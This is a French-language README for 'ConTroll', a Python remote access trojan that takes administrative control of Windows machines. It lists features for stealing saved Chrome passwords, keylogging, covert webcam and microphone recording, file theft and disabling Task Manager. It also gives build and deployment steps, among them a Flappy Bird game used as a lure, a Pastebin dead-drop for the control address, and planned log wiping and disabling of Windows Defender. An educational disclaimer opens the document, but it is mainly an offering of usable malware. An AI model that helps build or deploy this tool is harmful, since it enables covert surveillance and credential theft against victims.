
AVERTISSEMENT
ConTroll est uniquement destiné à des fins éducatives et de recherche. L'auteur décline toute responsabilité quant à l'utilisation que vous faites des outils/code source/fichiers fournis. L'auteur et toute personne affiliée ne pourront être tenus responsables des pertes et/ou dommages liés à l'utilisation de TOUT fichier fourni avec ConTroll. En utilisant ConTroll ou tout fichier inclus, vous comprenez que vous ACCEPTEZ DE L'UTILISER À VOS PROPRES RISQUES.
Encore une fois, ConTroll et TOUS les fichiers inclus sont uniquement destinés à des fins ÉDUCATIVES et/ou de RECHERCHE. ConTroll est destiné à être utilisé uniquement sur vos propres laboratoires de test d'intrusion, ou avec le consentement explicite du propriétaire du système testé.
ConTroll - Cheval de Troie d'Accès à Distance (RAT)
Regardez la vidéo de présentation ici
Création d'un cheval de troie d'accès à distance qui établit un contrôle administratif sur toute machine Windows qu'il compromet.

MISES À JOUR DEPUIS LA VIDÉO DE PRÉSENTATION
- Mise à jour à distance de l'adresse IP et du port que le client doit utiliser
- Saisie de l'adresse IP lors de l'exécution du serveur
- Désactiver le gestionnaire de tâches
Fonctionnalités
- Verrouiller l'écran de la victime.
- Reconnexion automatique au serveur.
- Créer une boîte de dialogue personnalisée.
- Récupérer des fichiers depuis la machine de la victime.
- Obtenir des informations sur la machine de la victime.
- Voler les mots de passe enregistrés dans Chrome.
- Activer la webcam du système et enregistrer une vidéo.
- Activer le microphone du système et enregistrer un audio.
- Tuer tout processus en cours sur la machine de la victime.
- Surveiller le comportement de l'utilisateur via un enregistreur de frappe (frappes et captures d'écran).
- Désactiver le gestionnaire de tâches. (ATTENTION : VOUS POURRIEZ SOUHAITER DÉSACTIVER CECI SI VOUS EXÉCUTEZ EN LOCAL)
Prérequis
Vous avez besoin d'une architecture système d'exploitation 32 bits pour construire les binaires. Utilisez donc un système Windows 32 ou Unix 32 pour exécuter et construire le code.
- python 2.x
- opencv
- numpy
- pyhook
- pythoncom
- pyinstaller
- pygame
- py2exe
- pyAudio
Utilisation
NOUVEAU
CRÉEZ UN COMPTE PASTEBIN, CRÉEZ UN NOUVEAU PASTE AVEC L'ADRESSE IP ET LE NUMÉRO DE PORT AUXQUELS LE CLIENT DOIT ENVOYER LES RÉPONSES. L'ADRESSE IP ET LE NUMÉRO DE PORT DOIVENT ÊTRE SÉPARÉS PAR DEUX-POINTS COMME CECI 192.168.12.14:5000. APRÈS AVOIR CRÉÉ LE POST, CLIQUEZ SUR RAW, CECI DEVRAIT VOUS REDIRIGER VERS UNE PAGE CONTENANT UNIQUEMENT L'ADRESSE IP ET LE NUMÉRO DE PORT ; COPIEZ CE LIEN ET COLLEZ-LE DANS CLIENT.PYW DANS LA FONCTION getIpAddress. SI POUR UNE RAISON QUELLE CONQUE VOUS SOUHAITEZ METTRE À JOUR L'IP ET/OU LE PORT QUE LE CLIENT DOIT UTILISER, CONNECTEZ-VOUS À VOTRE COMPTE PASTEBIN ET EFFECTUEZ LES MODIFICATIONS, ENREGISTREZ-LE ET LE CLIENT ADOPTERA CES CHANGEMENTS.
- Clonez le dépôt
git clone https://github.com/Lithium95/ConTroll_Remote_Access_Trojan.git
- Installez opencv et numpy à partir de requirements.txt
python -m pip install -r requirements.txt
-
Téléchargez et installez pyHook
-
Téléchargez et installez pythoncom
-
Téléchargez la roue pyAudio
-
Installez le fichier wheel
python -m pip install PyAudio-0.2.11-cp27-cp27m-win32.whl
- Utilisez pyinstaller pour construire le binaire client
python pyinstaller.py --onefile --windowed client.pyw
Passez les 2 étapes suivantes si vous ne voulez pas utiliser le jeu flappy bird
- Configurez un serveur local pour héberger le client.exe. Utilisez live-server
- Utilisez py2exe pour construire le jeu flappy bird
L'exe du jeu flappy bird se trouvera dans un dossier nommé 'dist'
- Lancez le serveur
- Attendez que le client se connecte
À faire
- Rendre le RAT multiplateforme
- Effacer les journaux Système, Sécurité et Application
- Chiffrer la communication entre le serveur et le client
- Modifier les propriétés d'accès, de création et de modification des fichiers
- Activer/Désactiver des services tels que RDP, UAC et Windows Defender